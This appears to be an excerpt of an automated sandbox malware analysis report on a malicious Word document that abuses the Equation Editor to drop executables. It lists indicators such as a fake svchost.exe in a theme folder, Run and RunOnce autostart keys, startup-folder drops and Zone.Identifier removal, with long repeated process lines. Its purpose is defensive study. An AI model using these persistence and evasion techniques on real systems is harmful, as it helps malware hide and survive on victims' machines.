Source:	Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0FB-4BFC-874A-C0F2E0B9FA8E}\WinDirStat\windirstat.exed source: powershell.exe, 00000016.00000002.2154655954.00000000007B3000.00000004.00000020.sdmp
Source:	Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2112205966.0000000002A50000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp

Source: mad[1].exe.2.dr

Static PE information: 0x84B8EC41 [Tue Jul 24 03:00:17 2040 UTC]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02B20591 pushad ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02B20681 pushad ; ret

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: unknown

Executable created and started: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File created: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6

Jump to behavior

Creates multiple autostart registry keys

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File opened: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
